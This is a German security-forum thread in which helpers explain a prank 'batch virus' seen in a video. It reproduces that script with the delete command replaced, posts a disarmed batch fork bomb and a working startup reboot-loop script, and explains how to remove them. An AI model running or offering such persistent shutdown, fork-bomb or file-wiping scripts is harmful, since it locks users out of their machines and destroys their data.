Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Alles rund um Windows (https://www.trojaner-board.de/alles-rund-um-windows/)
-   -   kann man einen batch befhel virus unter windows abstellen? (https://www.trojaner-board.de/153900-man-batch-befhel-virus-windows-abstellen.html)

saufbiene 15.05.2014 11:30

kann man einen batch befhel virus unter windows abstellen?
 
hi ich hab mal beim googlen nach einen toturial für ein spiel was im editor programiert wird bzw wie man es dort programmieren kann über ein toturial gestolpert was einen batch befehl virus zeigt.

Code:

gelöscht
dieses video zeigt so einen ich habe nur mal so aus neugierde mir es angeschaut und wollte wissen ob der virus schädlich ist und wie man ihn wieder entfernt sollte er auf den pc gelangen.

grüße
saufbiene

PS:
sollte ich hier falsch sein in der rubrik bitte verschieben.
wusste nicht wo es jetzt hingehört.

Warlord711 15.05.2014 11:33

Dein Youtube Link ist ungültig.

saufbiene 15.05.2014 11:35

habe es geändert und hoffe das es jetzt geht

Warlord711 15.05.2014 11:57

:rofl:

"Losbekommen" tut man ihn leicht, das ist ein einfachstes Batch Script.
Ärgerlich wäre nur das, was er anrichtet.

Ein "Virus" ist das nicht, den ihm fehlen wichtige Eigenschaften wie Selbstverbreitung, Selbsterhaltung durch Schutzmassnahmen, Trojanisierung usw.

Kurz gesagt:

Ein Kiddie hat ein Billiges Batch-Script gesammengeschrieben.

Ich hab mal den Code hier:

Code:

@echo off

Rundll32 user32, SwapMouseButton

copy virus.bat "%userprofile%\Startm~1\Programs\Startup"

set date=1
time 0:00

cd %userprofile%\desktop
FOR %%A in (*.*) DO DXX %%A

cd %userprofile%\documents
FOR %%A IN (*.*) DO DXX %%A

cd %userprofile%\desktop
md %random%
.
.
.
md %random%
shutdown -r -t 120 -c "pwnd kuh!"

Das Script hat aber leider mit

Code:

cd %userprofile%\desktop
FOR %%A in (*.*) DO DXX %%A

cd %userprofile%\documents
FOR %%A IN (*.*) DO DXX %%A



zerstörerische Komponenten, da diese Befehle den Inhalt vom Desktop, sowie vom Benutzerordner "Dokumente" löscht.


Ich habe den richtigen Befehl ersetzt, damit hier niemand das Script abkopiert und ausführt.

Der Ablauf ist so:
  1. Das Script vertauscht Linke+Rechte Maustaste
  2. Kopiert sich dann in den Autostart-Ordner, um beim Computerstart aufgerufen zu werden
  3. Setzt dann das Datum und Uhrzeit anders
  4. Löscht den INhalt vom Desktop und Dokumente Ordner
  5. Erstellt Ordner mit zufälligen Namen auf dem Desktop
  6. Startet dann den Rechner nach 2 Minute neu

Falls du dir den Quatsch angetan hast, musst du nur die Batch Datei löschen.
Sie sollte unter %userprofile%\Startm~1\Programs\Startup\virus.bat zu finden sein.

saufbiene 15.05.2014 12:10

ahhh danke :D
für die info :)
werde auch den link zum video entfernen damit keiner sich den noch zsm baut und selber sich damit infiziert sage ich jetzt mal ^^

painfulsmile 15.05.2014 12:28

Immerhin kein /R in der Schleife :-) :-) :-)

Das wäre noch lustiger. :-)

saufbiene 15.05.2014 13:06

hihi ich glaube da würden sich viele noch mehr ärgern lach

Warlord711 15.05.2014 13:19

Ich sag es mal ganz offen:

Wer sowas nachmacht ohne sich zu informieren, ist selbst Schuld.

Dann lieber was "harmloseres":

Code:

@echo off
:START
start %0
PAUSE
GOTO START

Nennt sich "Fork Bomb", da sich das Programm nur eine Schleife ist, die das Programm immer wieder neu aufruft (und damit auch wieder neue Schleifen, die wieder neue Instanzen starten usw.).


Ich hab wegen Nachmachungstäter eine PAUSE eingebaut ;) Nimmt man diese raus, geht nix mehr.

saufbiene 15.05.2014 13:39

hmmm mir würde da auch noch ein spaß einfallen
einfach den rechner gar nicht hochfahren lassen sondern direkt wieder runterfahren lassen ;)

leider kann ich hier keinen wiederherstellungspunkt einfügen bevor er das mit dem runterfahren macht -.-*
zum entfernen dieses scriptest am besten abgesicherter modus benutzen ^^

Code:

@echo off
copy devil.bat "%userprofile%\Startm~1\Programs\Startup"
shutdown -r -t 00 -c "bye"

achso der shutdown befehl ist gar nicht so verkehrt im falle eines notfalls ^^
oder um zu verhindern das der pc runtergefahren wird

Warlord711 15.05.2014 14:43

Richtig.

Shutdown ist halt schon sinnvoll, um z.b. nach Ablauf eines Scriptes den Rechner herunterzufahren oder neu zu starten.

Etwas umfangreicher ist PsShutdown


Alle Zeitangaben in WEZ +1. Es ist jetzt 09:21 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19